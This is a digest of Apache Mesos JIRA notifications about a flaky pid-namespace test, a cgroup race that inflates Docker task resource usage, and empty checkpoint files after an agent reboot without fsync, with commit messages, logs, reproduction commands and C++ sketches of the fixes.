[jira] [Commented] (MESOS-8305) DefaultExecutorTest.ROOT_MultiTaskgroupSharePidNamespace is flaky.

2018-01-23 Thread Qian Zhang (JIRA)

[ 
https://issues.apache.org/jira/browse/MESOS-8305?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel=16337043#comment-16337043
 ] 

Qian Zhang commented on MESOS-8305:
---

commit 180129dbd2cc2d8e130e860a4de30d211a69f6be
Author: Qian Zhang 
Date: Tue Jan 23 08:33:03 2018 +0800

Fixed a race in the test `ROOT_MultiTaskgroupSharePidNamespace`.
 
 In the test `DefaultExecutorTest.ROOT_MultiTaskgroupSharePidNamespace`,
 we read the file `ns` in each of the two tasks' sandboxes and check that
 their contents (the pid namespace of each task) are the same. However,
 it is possible that we read the file for the second task after it has
 been created but before it has been written, i.e., the content we read
 from the second task's `ns` file would be empty, which causes the check
 to fail.
 
 In this patch, we read the file `ns` for each task in a while loop, and
 only break out of the loop once both tasks' files are non-empty.
 
 Review: https://reviews.apache.org/r/65278
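
For illustration, here is a minimal standalone sketch of the retry pattern the fix describes. It is not the actual test change in r/65278; the sandbox paths and the {{readNamespaceFile}} helper are assumptions made for the example, and a real test would bound the retries with a timeout.
{noformat}
#include <cctype>
#include <chrono>
#include <fstream>
#include <iostream>
#include <sstream>
#include <string>
#include <thread>

// Hypothetical helper: return the trimmed contents of a task's `ns` file
// (empty if the file does not exist or has not been written yet).
static std::string readNamespaceFile(const std::string& path)
{
  std::ifstream file(path);
  std::stringstream buffer;
  buffer << file.rdbuf();

  std::string contents = buffer.str();
  while (!contents.empty() &&
         std::isspace(static_cast<unsigned char>(contents.back()))) {
    contents.pop_back();
  }
  return contents;
}

int main()
{
  // Assumed sandbox paths for the two tasks; in the real test these come
  // from the agent's sandbox layout.
  const std::string sandbox1 = "/tmp/task1";
  const std::string sandbox2 = "/tmp/task2";

  // Poll until both `ns` files have been created *and* written; reading
  // only once is exactly the race described above.
  std::string ns1, ns2;
  do {
    ns1 = readNamespaceFile(sandbox1 + "/ns");
    ns2 = readNamespaceFile(sandbox2 + "/ns");
    std::this_thread::sleep_for(std::chrono::milliseconds(100));
  } while (ns1.empty() || ns2.empty());

  // Both tasks should share the same pid namespace.
  std::cout << (ns1 == ns2 ? "same" : "different") << std::endl;
  return 0;
}
{noformat}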

> DefaultExecutorTest.ROOT_MultiTaskgroupSharePidNamespace is flaky.
> --
>
> Key: MESOS-8305
> URL: https://issues.apache.org/jira/browse/MESOS-8305
> Project: Mesos
>  Issue Type: Bug
> Environment: Ubuntu 16.04
> Fedora 23
>Reporter: Alexander Rukletsov
>Assignee: Qian Zhang
>Priority: Major
>  Labels: flaky-test
> Fix For: 1.6.0
>
> Attachments: ROOT_MultiTaskgroupSharePidNamespace-badrun.txt
>
>
> On Ubuntu 16.04:
> {noformat}
> ../../src/tests/default_executor_tests.cpp:1877
>   Expected: strings::trim(pidNamespace1.get())
>   Which is: "4026532250"
> To be equal to: strings::trim(pidNamespace2.get())
>   Which is: ""
> {noformat}
> Full log attached.
> On Fedora 23:
> {noformat}
> ../../src/tests/default_executor_tests.cpp:1878
>   Expected: strings::trim(pidNamespace1.get())
>   Which is: "4026532233"
> To be equal to: strings::trim(pidNamespace2.get())
>   Which is: ""
> {noformat}
> The test became flaky shortly after MESOS-7306 was committed and is likely 
> related to it.



--
This message was sent by Atlassian JIRA
(v7.6.3#76005)


[jira] [Updated] (MESOS-8480) Mesos returns high resource usage when killing a Docker task.

2018-01-23 Thread Jie Yu (JIRA)

 [ 
https://issues.apache.org/jira/browse/MESOS-8480?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Jie Yu updated MESOS-8480:
--
Description: 
The way we get resource statistics for Docker tasks is through getting the 
cgroup subsystem path through {{/proc//cgroup}} first (taking the 
{{cpuacct}} subsystem as an example):
{noformat}
9:cpuacct,cpu:/docker/66fbe67b64ad3a86c6e080e18578bc9e540e55ee0bdcae09c2e131a4264a3a3b
{noformat}
Then read 
{{/sys/fs/cgroup/cpuacct//docker/66fbe67b64ad3a86c6e080e18578bc9e540e55ee0bdcae09c2e131a4264a3a3b/cpuacct.stat}}
 to get the statistics:
{noformat}
user 4
system 0
{noformat}
However, when a Docker container is being torn down, it seems that Docker or 
the operating system will first move the process to the root cgroup before 
actually killing it, making {{/proc//docker}} look like the following:
{noformat}
9:cpuacct,cpu:/
{noformat}
This makes a racy call to 
[{{cgroup::internal::cgroup()}}|https://github.com/apache/mesos/blob/master/src/linux/cgroups.cpp#L1935]
 return a single '/', which in turn makes 
[{{DockerContainerizerProcess::cgroupsStatistics()}}|https://github.com/apache/mesos/blob/master/src/slave/containerizer/docker.cpp#L1991]
 read {{/sys/fs/cgroup/cpuacct///cpuacct.stat}}, which contains the statistics 
for the root cgroup:
{noformat}
user 228058750
system 24506461
{noformat}
This can be reproduced by [^test.cpp] with the following command:
{noformat}
$ docker run --name sleep -d --rm alpine sleep 1000; ./test $(docker inspect 
sleep | jq .[].State.Pid) & sleep 1 && docker rm -f sleep
...

Reading file '/proc/44224/cgroup'
Reading file 
'/sys/fs/cgroup/cpuacct//docker/1d79a6c877e2af3081630aa57d23d853e6bd7d210dad28f897556bfea20bc9c1/cpuacct.stat'
user 4
system 0

Reading file '/proc/44224/cgroup'
Reading file '/sys/fs/cgroup/cpuacct///cpuacct.stat'
user 228058750
system 24506461

Reading file '/proc/44224/cgroup'
Reading file '/sys/fs/cgroup/cpuacct///cpuacct.stat'
user 228058750
system 24506461

Failed to open file '/proc/44224/cgroup'
sleep
[2]-  Exit 1  ./test $(docker inspect sleep | jq .[].State.Pid)
{noformat}
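
For reference, the statistics-gathering path described above can be sketched as a small standalone program: scan the pid's {{cgroup}} file under {{/proc}} for the {{cpuacct}} hierarchy, then dump {{cpuacct.stat}}. This is only an illustration of the mechanism (it is not the attached [^test.cpp]) and the parsing is deliberately simplified.
{noformat}
#include <fstream>
#include <iostream>
#include <string>

int main(int argc, char** argv)
{
  if (argc != 2) {
    std::cerr << "Usage: " << argv[0] << " <pid>" << std::endl;
    return 1;
  }

  const std::string pid = argv[1];

  // Each line looks like "9:cpuacct,cpu:/docker/<id>"; a bare "/" means the
  // process is (already) in the root cgroup.
  std::ifstream cgroupFile("/proc/" + pid + "/cgroup");
  std::string line, cgroup;
  while (std::getline(cgroupFile, line)) {
    const auto first = line.find(':');
    const auto second = line.find(':', first + 1);
    if (first == std::string::npos || second == std::string::npos) {
      continue;
    }
    if (line.substr(first + 1, second - first - 1).find("cpuacct") !=
        std::string::npos) {
      cgroup = line.substr(second + 1);
      break;
    }
  }

  // If the container is being torn down, `cgroup` can race to "/" and this
  // ends up reading the root cgroup's statistics, as shown above.
  std::ifstream stat("/sys/fs/cgroup/cpuacct/" + cgroup + "/cpuacct.stat");
  std::cout << stat.rdbuf();
  return 0;
}
{noformat}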

  was:
The way we get resource statistics for Docker tasks is through getting the 
cgroup subsystem path through {{/proc//docker}} first (taking the 
{{cpuacct}} subsystem as an example):
{noformat}
9:cpuacct,cpu:/docker/66fbe67b64ad3a86c6e080e18578bc9e540e55ee0bdcae09c2e131a4264a3a3b
{noformat}
Then read 
{{/sys/fs/cgroup/cpuacct//docker/66fbe67b64ad3a86c6e080e18578bc9e540e55ee0bdcae09c2e131a4264a3a3b/cpuacct.stat}}
 to get the statistics:
{noformat}
user 4
system 0
{noformat}

However, when a Docker container is being torn down, it seems that Docker or 
the operating system will first move the process to the root cgroup before 
actually killing it, making {{/proc//docker}} look like the following:
{noformat}
9:cpuacct,cpu:/
{noformat}
This makes a racy call to 
[{{cgroup::internal::cgroup()}}|https://github.com/apache/mesos/blob/master/src/linux/cgroups.cpp#L1935]
 return a single '/', which in turn makes 
[{{DockerContainerizerProcess::cgroupsStatistics()}}|https://github.com/apache/mesos/blob/master/src/slave/containerizer/docker.cpp#L1991]
 read {{/sys/fs/cgroup/cpuacct///cpuacct.stat}}, which contains the statistics 
for the root cgroup:
{noformat}
user 228058750
system 24506461
{noformat}

This can be reproduced by [^test.cpp] with the following command:
{noformat}
$ docker run --name sleep -d --rm alpine sleep 1000; ./test $(docker inspect 
sleep | jq .[].State.Pid) & sleep 1 && docker rm -f sleep
...

Reading file '/proc/44224/cgroup'
Reading file 
'/sys/fs/cgroup/cpuacct//docker/1d79a6c877e2af3081630aa57d23d853e6bd7d210dad28f897556bfea20bc9c1/cpuacct.stat'
user 4
system 0

Reading file '/proc/44224/cgroup'
Reading file '/sys/fs/cgroup/cpuacct///cpuacct.stat'
user 228058750
system 24506461

Reading file '/proc/44224/cgroup'
Reading file '/sys/fs/cgroup/cpuacct///cpuacct.stat'
user 228058750
system 24506461

Failed to open file '/proc/44224/cgroup'
sleep
[2]-  Exit 1  ./test $(docker inspect sleep | jq .[].State.Pid)
{noformat}


> Mesos returns high resource usage when killing a Docker task.
> -
>
> Key: MESOS-8480
> URL: https://issues.apache.org/jira/browse/MESOS-8480
> Project: Mesos
>  Issue Type: Bug
>  Components: cgroups
>Reporter: Chun-Hung Hsiao
>Assignee: Chun-Hung Hsiao
>Priority: Major
> Fix For: 1.3.2, 1.4.2, 1.6.0, 1.5.1
>
> Attachments: test.cpp
>
>
> The way we get resource statistics for Docker tasks is through getting the 
> cgroup subsystem path through {{/proc//cgroup}} first (taking the 
> {{cpuacct}} subsystem as an example):
> {noformat}
> 9:cpuacct,cpu:/docker/66fbe67b64ad3a86c6e080e18578bc9e540e55ee0bdcae09c2e131a4264a3a3b
> {noformat}
> Then 

[jira] [Commented] (MESOS-8481) Agent reboot during checkpointing may result in empty checkpoints.

2018-01-23 Thread Chun-Hung Hsiao (JIRA)

[ 
https://issues.apache.org/jira/browse/MESOS-8481?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel=16336793#comment-16336793
 ] 

Chun-Hung Hsiao commented on MESOS-8481:


[~jieyu] pointed out that {{rename}} without {{fsync}} might suffer from the 
"zero-length file problem": https://stackoverflow.com/a/41362774
Related article: 
https://thunk.org/tytso/blog/2009/03/12/delayed-allocation-and-the-zero-length-file-problem/
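
For context, the usual mitigation for that problem is to {{fsync}} the data (and then the containing directory) around the {{rename}} so that neither the contents nor the directory entry can be lost across a reboot. Below is a minimal sketch of that pattern using plain POSIX calls and a hypothetical checkpoint path; it is not Mesos' actual checkpointing code.
{noformat}
#include <cstdio>
#include <fcntl.h>
#include <string>
#include <sys/types.h>
#include <unistd.h>

// Write `data` to a temporary file, fsync it, rename it into place, then
// fsync the parent directory so the rename itself is durable.
bool checkpoint(const std::string& path, const std::string& data)
{
  const std::string temp = path + ".tmp";

  int fd = ::open(temp.c_str(), O_WRONLY | O_CREAT | O_TRUNC, 0600);
  if (fd < 0) {
    return false;
  }

  if (::write(fd, data.data(), data.size()) !=
        static_cast<ssize_t>(data.size()) ||
      ::fsync(fd) != 0) {  // Flush the file contents to disk.
    ::close(fd);
    return false;
  }
  ::close(fd);

  if (std::rename(temp.c_str(), path.c_str()) != 0) {
    return false;
  }

  // fsync the directory so the new directory entry survives a crash/reboot.
  const std::string dir = path.substr(0, path.find_last_of('/'));
  int dirfd = ::open(dir.c_str(), O_RDONLY | O_DIRECTORY);
  if (dirfd >= 0) {
    ::fsync(dirfd);
    ::close(dirfd);
  }

  return true;
}

int main()
{
  // Hypothetical path; the real agent writes under its meta directory.
  return checkpoint("/tmp/framework.info", "serialized framework info") ? 0 : 1;
}
{noformat}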

> Agent reboot during checkpointing may result in empty checkpoints.
> --
>
> Key: MESOS-8481
> URL: https://issues.apache.org/jira/browse/MESOS-8481
> Project: Mesos
>  Issue Type: Bug
>Reporter: Chun-Hung Hsiao
>Assignee: Michael Park
>Priority: Major
>
> An empty checkpoint file was created due to the following incident.
> At 17:12:25, the master assigned a task to an agent:
> {noformat}
> I0123 17:12:25.00 18618 master.cpp:11457] Adding task 5602 with resources 
> cpus(allocated: *):0.1; mem(allocated: *):128 on agent 
> aaf0a62f-a6eb-4c1d-80db-5fdd26fe8008-S4 at slave(1)@:5051 
> ()
> I0123 17:12:25.00 18618 master.cpp:5017] Launching task 5602 of framework 
> 6f9b0688-38f7-4b38-bb1c-421f55e486e5-0112 (Balloon Framework OOM) at 
> scheduler-fbba22f7-ebbc-4864-8394-0aa558f8ffaa@:10015 with resources 
> [...] on agent aaf0a62f-a6eb-4c1d-80db-5fdd26fe8008-S4 at 
> slave(1)@:5051 ()
> {noformat}
> Meanwhile, the agent is being rebooted:
> {noformat}
> $ last reboot
> reboot   system boot  3.10.0-693.11.6. Tue Jan 23 17:14 - 00:09  (06:55)
> {noformat}
> The agent log did not show any information about the task, possibly because 
> there was no fsync before reboot:
> {noformat}
> I0123 17:12:09.00 17237 http.cpp:851] Authorizing principal 
> 'dcos_checks_agent' to GET the endpoint '/metrics/snapshot'
> -- Reboot --
> I0123 17:15:40.00  2689 logsink.cpp:89] Added FileSink for glog logs to: 
> /var/log/mesos/mesos-agent.log
> {noformat}
> However, the agent was checkpointing the task before reboot:
> {noformat}
> $ sudo stat 
> /var/lib/mesos/slave/meta/slaves/aaf0a62f-a6eb-4c1d-80db-5fdd26fe8008-S4/frameworks/6f9b0688-38f7-4b38-bb1c-421f55e486e5-0112/executors/5602/
>   File: 
> ‘/var/lib/mesos/slave/meta/slaves/aaf0a62f-a6eb-4c1d-80db-5fdd26fe8008-S4/frameworks/6f9b0688-38f7-4b38-bb1c-421f55e486e5-0112/executors/5602/’
>   Size: 39  Blocks: 0  IO Block: 4096   directory
> Device: ca40h/51776d  Inode: 67306254Links: 3
> Access: (0755/drwxr-xr-x)  Uid: (0/root)   Gid: (0/root)
> Context: system_u:object_r:unlabeled_t:s0
> Access: 2018-01-24 00:23:43.237322609 +
> Modify: 2018-01-23 17:12:25.751463030 +
> Change: 2018-01-23 17:12:25.751463030 +
>  Birth: -
> {noformat}
> And since there was no fsync before reboot, all checkpoints resulted in empty 
> files:
> {noformat}
> $ sudo stat 
> /var/lib/mesos/slave/meta/slaves/aaf0a62f-a6eb-4c1d-80db-5fdd26fe8008-S4/frameworks/6f9b0688-38f7-4b38-bb1c-421f55e486e5-0112/framework.info
>   File: 
> ‘/var/lib/mesos/slave/meta/slaves/aaf0a62f-a6eb-4c1d-80db-5fdd26fe8008-S4/frameworks/6f9b0688-38f7-4b38-bb1c-421f55e486e5-0112/framework.info’
>   Size: 0   Blocks: 0  IO Block: 4096   regular empty file
> Device: ca40h/51776dInode: 33967500Links: 1
> Access: (0600/-rw---)  Uid: (0/root)   Gid: (0/root)
> Context: system_u:object_r:unlabeled_t:s0
> Access: 2018-01-23 17:15:41.485506070 +
> Modify: 2018-01-23 17:12:25.749463047 +
> Change: 2018-01-23 17:12:25.749463047 +
>  Birth: -
> $ sudo stat 
> /var/lib/mesos/slave/meta/slaves/aaf0a62f-a6eb-4c1d-80db-5fdd26fe8008-S4/frameworks/6f9b0688-38f7-4b38-bb1c-421f55e486e5-0112/framework.pid
>   File: 
> ‘/var/lib/mesos/slave/meta/slaves/aaf0a62f-a6eb-4c1d-80db-5fdd26fe8008-S4/frameworks/6f9b0688-38f7-4b38-bb1c-421f55e486e5-0112/framework.pid’
>   Size: 0   Blocks: 0  IO Block: 4096   regular empty file
> Device: ca40h/51776dInode: 33967495Links: 1
> Access: (0600/-rw---)  Uid: (0/root)   Gid: (0/root)
> Context: system_u:object_r:unlabeled_t:s0
> Access: 2018-01-23 23:00:42.190975780 +
> Modify: 2018-01-23 17:12:25.749463047 +
> Change: 2018-01-23 17:12:25.749463047 +
>  Birth: -
> $ sudo stat 
> /var/lib/mesos/slave/meta/slaves/aaf0a62f-a6eb-4c1d-80db-5fdd26fe8008-S4/frameworks/6f9b0688-38f7-4b38-bb1c-421f55e486e5-0112/executors/5602/executor.info
>   File: 
> ‘/var/lib/mesos/slave/meta/slaves/aaf0a62f-a6eb-4c1d-80db-5fdd26fe8008-S4/frameworks/6f9b0688-38f7-4b38-bb1c-421f55e486e5-0112/executors/5602/executor.info’
>   Size: 0 Blocks: 0  IO Block: 4096   regular empty file
> Device: ca40h/51776d  Inode: 67306255Links: 1
> Access: (0600/-rw---)  Uid: (0/root)   Gid: (0/root)
> 

[jira] [Updated] (MESOS-8481) Agent reboot during checkpointing may result in empty checkpoints.

2018-01-23 Thread Chun-Hung Hsiao (JIRA)

 [ 
https://issues.apache.org/jira/browse/MESOS-8481?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Chun-Hung Hsiao updated MESOS-8481:
---
Description: 
An empty checkpoint file was created due to the following incident.

At 17:12:25, the master assigned a task to an agent:
{noformat}
I0123 17:12:25.00 18618 master.cpp:11457] Adding task 5602 with resources 
cpus(allocated: *):0.1; mem(allocated: *):128 on agent 
aaf0a62f-a6eb-4c1d-80db-5fdd26fe8008-S4 at slave(1)@:5051 ()
I0123 17:12:25.00 18618 master.cpp:5017] Launching task 5602 of framework 
6f9b0688-38f7-4b38-bb1c-421f55e486e5-0112 (Balloon Framework OOM) at 
scheduler-fbba22f7-ebbc-4864-8394-0aa558f8ffaa@:10015 with resources [...] 
on agent aaf0a62f-a6eb-4c1d-80db-5fdd26fe8008-S4 at slave(1)@:5051 
()
{noformat}
Meanwhile, the agent is being rebooted:
{noformat}
$ last reboot
reboot   system boot  3.10.0-693.11.6. Tue Jan 23 17:14 - 00:09  (06:55)
{noformat}
The agent log did not show any information about the task, possibly because 
there was no fsync before reboot:
{noformat}
I0123 17:12:09.00 17237 http.cpp:851] Authorizing principal 
'dcos_checks_agent' to GET the endpoint '/metrics/snapshot'
-- Reboot --
I0123 17:15:40.00  2689 logsink.cpp:89] Added FileSink for glog logs to: 
/var/log/mesos/mesos-agent.log
{noformat}
However, the agent was checkpointing the task before reboot:
{noformat}
$ sudo stat 
/var/lib/mesos/slave/meta/slaves/aaf0a62f-a6eb-4c1d-80db-5fdd26fe8008-S4/frameworks/6f9b0688-38f7-4b38-bb1c-421f55e486e5-0112/executors/5602/
  File: 
‘/var/lib/mesos/slave/meta/slaves/aaf0a62f-a6eb-4c1d-80db-5fdd26fe8008-S4/frameworks/6f9b0688-38f7-4b38-bb1c-421f55e486e5-0112/executors/5602/’
  Size: 39  Blocks: 0  IO Block: 4096   directory
Device: ca40h/51776dInode: 67306254Links: 3
Access: (0755/drwxr-xr-x)  Uid: (0/root)   Gid: (0/root)
Context: system_u:object_r:unlabeled_t:s0
Access: 2018-01-24 00:23:43.237322609 +
Modify: 2018-01-23 17:12:25.751463030 +
Change: 2018-01-23 17:12:25.751463030 +
 Birth: -
{noformat}
And since there was no fsync before reboot, all checkpoints resulted in empty 
files:
{noformat}
$ sudo stat 
/var/lib/mesos/slave/meta/slaves/aaf0a62f-a6eb-4c1d-80db-5fdd26fe8008-S4/frameworks/6f9b0688-38f7-4b38-bb1c-421f55e486e5-0112/framework.info
  File: 
‘/var/lib/mesos/slave/meta/slaves/aaf0a62f-a6eb-4c1d-80db-5fdd26fe8008-S4/frameworks/6f9b0688-38f7-4b38-bb1c-421f55e486e5-0112/framework.info’
  Size: 0   Blocks: 0  IO Block: 4096   regular empty file
Device: ca40h/51776dInode: 33967500Links: 1
Access: (0600/-rw---)  Uid: (0/root)   Gid: (0/root)
Context: system_u:object_r:unlabeled_t:s0
Access: 2018-01-23 17:15:41.485506070 +
Modify: 2018-01-23 17:12:25.749463047 +
Change: 2018-01-23 17:12:25.749463047 +
 Birth: -
$ sudo stat 
/var/lib/mesos/slave/meta/slaves/aaf0a62f-a6eb-4c1d-80db-5fdd26fe8008-S4/frameworks/6f9b0688-38f7-4b38-bb1c-421f55e486e5-0112/framework.pid
  File: 
‘/var/lib/mesos/slave/meta/slaves/aaf0a62f-a6eb-4c1d-80db-5fdd26fe8008-S4/frameworks/6f9b0688-38f7-4b38-bb1c-421f55e486e5-0112/framework.pid’
  Size: 0   Blocks: 0  IO Block: 4096   regular empty file
Device: ca40h/51776dInode: 33967495Links: 1
Access: (0600/-rw---)  Uid: (0/root)   Gid: (0/root)
Context: system_u:object_r:unlabeled_t:s0
Access: 2018-01-23 23:00:42.190975780 +
Modify: 2018-01-23 17:12:25.749463047 +
Change: 2018-01-23 17:12:25.749463047 +
 Birth: -
$ sudo stat 
/var/lib/mesos/slave/meta/slaves/aaf0a62f-a6eb-4c1d-80db-5fdd26fe8008-S4/frameworks/6f9b0688-38f7-4b38-bb1c-421f55e486e5-0112/executors/5602/executor.info
  File: 
‘/var/lib/mesos/slave/meta/slaves/aaf0a62f-a6eb-4c1d-80db-5fdd26fe8008-S4/frameworks/6f9b0688-38f7-4b38-bb1c-421f55e486e5-0112/executors/5602/executor.info’
  Size: 0   Blocks: 0  IO Block: 4096   regular empty file
Device: ca40h/51776dInode: 67306255Links: 1
Access: (0600/-rw---)  Uid: (0/root)   Gid: (0/root)
Context: system_u:object_r:unlabeled_t:s0
Access: 2018-01-23 17:12:25.751463030 +
Modify: 2018-01-23 17:12:25.751463030 +
Change: 2018-01-23 17:12:25.751463030 +
 Birth: -
{noformat}
So were {{forked.pid}} and {{task.info}}.

As a result, the agent failed to recover after reboot:
{noformat}
E0123 17:15:41.00  2709 slave.cpp:6800] EXIT with status 1: Failed to 
perform recovery: Failed to recover framework 
6f9b0688-38f7-4b38-bb1c-421f55e486e5-0112: Failed to read framework info from 
'/var/lib/mesos/slave/meta/slaves/aaf0a62f-a6eb-4c1d-80db-5fdd26fe8008-S4/frameworks/6f9b0688-38f7-4b38-bb1c-421f55e486e5-0112/framework.info':
 Found an empty file
{noformat}
The error came from 

[jira] [Updated] (MESOS-8480) Mesos returns high resource usage when killing a Docker task.

2018-01-23 Thread Jie Yu (JIRA)

 [ 
https://issues.apache.org/jira/browse/MESOS-8480?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Jie Yu updated MESOS-8480:
--
Fix Version/s: 1.5.1
   1.4.2
   1.3.2

> Mesos returns high resource usage when killing a Docker task.
> -
>
> Key: MESOS-8480
> URL: https://issues.apache.org/jira/browse/MESOS-8480
> Project: Mesos
>  Issue Type: Bug
>  Components: cgroups
>Reporter: Chun-Hung Hsiao
>Assignee: Chun-Hung Hsiao
>Priority: Major
> Fix For: 1.3.2, 1.4.2, 1.6.0, 1.5.1
>
> Attachments: test.cpp
>
>
> The way we get resource statistics for Docker tasks is through getting the 
> cgroup subsystem path through {{/proc//docker}} first (taking the 
> {{cpuacct}} subsystem as an example):
> {noformat}
> 9:cpuacct,cpu:/docker/66fbe67b64ad3a86c6e080e18578bc9e540e55ee0bdcae09c2e131a4264a3a3b
> {noformat}
> Then read 
> {{/sys/fs/cgroup/cpuacct//docker/66fbe67b64ad3a86c6e080e18578bc9e540e55ee0bdcae09c2e131a4264a3a3b/cpuacct.stat}}
>  to get the statistics:
> {noformat}
> user 4
> system 0
> {noformat}
> However, when a Docker container is being torn down, it seems that Docker 
> or the operating system will first move the process to the root cgroup before 
> actually killing it, making {{/proc//docker}} look like the following:
> {noformat}
> 9:cpuacct,cpu:/
> {noformat}
> This makes a racy call to 
> [{{cgroup::internal::cgroup()}}|https://github.com/apache/mesos/blob/master/src/linux/cgroups.cpp#L1935]
>  return a single '/', which in turn makes 
> [{{DockerContainerizerProcess::cgroupsStatistics()}}|https://github.com/apache/mesos/blob/master/src/slave/containerizer/docker.cpp#L1991]
>  read {{/sys/fs/cgroup/cpuacct///cpuacct.stat}}, which contains the 
> statistics for the root cgroup:
> {noformat}
> user 228058750
> system 24506461
> {noformat}
> This can be reproduced by [^test.cpp] with the following command:
> {noformat}
> $ docker run --name sleep -d --rm alpine sleep 1000; ./test $(docker inspect 
> sleep | jq .[].State.Pid) & sleep 1 && docker rm -f sleep
> ...
> Reading file '/proc/44224/cgroup'
> Reading file 
> '/sys/fs/cgroup/cpuacct//docker/1d79a6c877e2af3081630aa57d23d853e6bd7d210dad28f897556bfea20bc9c1/cpuacct.stat'
> user 4
> system 0
> Reading file '/proc/44224/cgroup'
> Reading file '/sys/fs/cgroup/cpuacct///cpuacct.stat'
> user 228058750
> system 24506461
> Reading file '/proc/44224/cgroup'
> Reading file '/sys/fs/cgroup/cpuacct///cpuacct.stat'
> user 228058750
> system 24506461
> Failed to open file '/proc/44224/cgroup'
> sleep
> [2]-  Exit 1  ./test $(docker inspect sleep | jq 
> .[].State.Pid)
> {noformat}



--
This message was sent by Atlassian JIRA
(v7.6.3#76005)


[jira] [Commented] (MESOS-8462) Unit test for `Slave::detachFile` on removed frameworks.

2018-01-23 Thread Qian Zhang (JIRA)

[ 
https://issues.apache.org/jira/browse/MESOS-8462?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel=16336718#comment-16336718
 ] 

Qian Zhang commented on MESOS-8462:
---

commit 12faca980084c565efdd3b0cfbb3b272d530ba5a
Author: Qian Zhang 
Date: Mon Jan 22 16:14:27 2018 +0800

Updated `SlaveRecoveryTest.RecoverCompletedExecutor` to verify gc.
 
 In the test `SlaveRecoveryTest.RecoverCompletedExecutor`, when the
 completed executor is recovered, verify that its work and meta
 directories are gc'ed successfully.
 
 Review: https://reviews.apache.org/r/65263

> Unit test for `Slave::detachFile` on removed frameworks.
> 
>
> Key: MESOS-8462
> URL: https://issues.apache.org/jira/browse/MESOS-8462
> Project: Mesos
>  Issue Type: Improvement
>Reporter: Chun-Hung Hsiao
>Assignee: Qian Zhang
>Priority: Major
>  Labels: mesosphere
> Fix For: 1.6.0
>
>
> We should add a unit test for MESOS-8460.



--
This message was sent by Atlassian JIRA
(v7.6.3#76005)


[jira] [Commented] (MESOS-8480) Mesos returns high resource usage when killing a Docker task.

2018-01-23 Thread Jie Yu (JIRA)

[ 
https://issues.apache.org/jira/browse/MESOS-8480?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel=16336710#comment-16336710
 ] 

Jie Yu commented on MESOS-8480:
---

commit 1382e595fa5e82f9917df97fbed76f77140ecc1e (HEAD -> master, origin/master, 
origin/HEAD)
Author: Chun-Hung Hsiao 
Date: Tue Jan 23 17:13:05 2018 -0800

Fixed resource statistics for Docker containers being destroyed.

If a process has exited but has not been reaped yet (i.e., a zombie
 process), `/proc//cgroup` will still exist, but the process's cgroup
 will have been reset to the root cgroup. In DockerContainerizer, we rely
 on `/proc//cgroup` to get the cpu/memory statistics of the container.
 If the `usage` call happens while the process is a zombie, the cpu/memory
 statistics will actually be those of the root cgroup, which is obviously
 not correct. See more details in MESOS-8480.

This patch fixes the issue by checking whether the cgroup of a given pid
 is the root cgroup.

Review: https://reviews.apache.org/r/65301/
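
To illustrate the kind of guard the patch describes (a hedged sketch only, not the actual change in r/65301), the idea is to look up the pid's {{cpuacct}} cgroup first and skip the statistics if it turns out to be the root cgroup:
{noformat}
#include <fstream>
#include <iostream>
#include <string>

#include <sys/types.h>

// Return the cgroup of `pid` in the hierarchy containing `subsystem`,
// or "" on error. A result of "/" means the process has been moved to
// the root cgroup (e.g. a zombie that has exited but not been reaped).
std::string cgroupOf(pid_t pid, const std::string& subsystem)
{
  std::ifstream file("/proc/" + std::to_string(pid) + "/cgroup");
  std::string line;
  while (std::getline(file, line)) {
    const auto first = line.find(':');
    const auto second = line.find(':', first + 1);
    if (first == std::string::npos || second == std::string::npos) {
      continue;
    }
    if (line.substr(first + 1, second - first - 1).find(subsystem) !=
        std::string::npos) {
      return line.substr(second + 1);
    }
  }
  return "";
}

int main(int argc, char** argv)
{
  if (argc != 2) {
    std::cerr << "Usage: " << argv[0] << " <pid>" << std::endl;
    return 1;
  }

  const std::string cgroup = cgroupOf(std::stoi(argv[1]), "cpuacct");

  if (cgroup.empty() || cgroup == "/") {
    // Don't report the root cgroup's numbers as the container's usage.
    std::cerr << "Container is gone or being destroyed; skipping statistics"
              << std::endl;
    return 1;
  }

  std::ifstream stat("/sys/fs/cgroup/cpuacct" + cgroup + "/cpuacct.stat");
  std::cout << stat.rdbuf();
  return 0;
}
{noformat}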

> Mesos returns high resource usage when killing a Docker task.
> -
>
> Key: MESOS-8480
> URL: https://issues.apache.org/jira/browse/MESOS-8480
> Project: Mesos
>  Issue Type: Bug
>  Components: cgroups
>Reporter: Chun-Hung Hsiao
>Assignee: Chun-Hung Hsiao
>Priority: Major
> Fix For: 1.6.0
>
> Attachments: test.cpp
>
>
> The way we get resource statistics for Docker tasks is through getting the 
> cgroup subsystem path through {{/proc//docker}} first (taking the 
> {{cpuacct}} subsystem as an example):
> {noformat}
> 9:cpuacct,cpu:/docker/66fbe67b64ad3a86c6e080e18578bc9e540e55ee0bdcae09c2e131a4264a3a3b
> {noformat}
> Then read 
> {{/sys/fs/cgroup/cpuacct//docker/66fbe67b64ad3a86c6e080e18578bc9e540e55ee0bdcae09c2e131a4264a3a3b/cpuacct.stat}}
>  to get the statistics:
> {noformat}
> user 4
> system 0
> {noformat}
> However, when a Docker container is being torn down, it seems that Docker 
> or the operating system will first move the process to the root cgroup before 
> actually killing it, making {{/proc//docker}} look like the following:
> {noformat}
> 9:cpuacct,cpu:/
> {noformat}
> This makes a racy call to 
> [{{cgroup::internal::cgroup()}}|https://github.com/apache/mesos/blob/master/src/linux/cgroups.cpp#L1935]
>  return a single '/', which in turn makes 
> [{{DockerContainerizerProcess::cgroupsStatistics()}}|https://github.com/apache/mesos/blob/master/src/slave/containerizer/docker.cpp#L1991]
>  read {{/sys/fs/cgroup/cpuacct///cpuacct.stat}}, which contains the 
> statistics for the root cgroup:
> {noformat}
> user 228058750
> system 24506461
> {noformat}
> This can be reproduced by [^test.cpp] with the following command:
> {noformat}
> $ docker run --name sleep -d --rm alpine sleep 1000; ./test $(docker inspect 
> sleep | jq .[].State.Pid) & sleep 1 && docker rm -f sleep
> ...
> Reading file '/proc/44224/cgroup'
> Reading file 
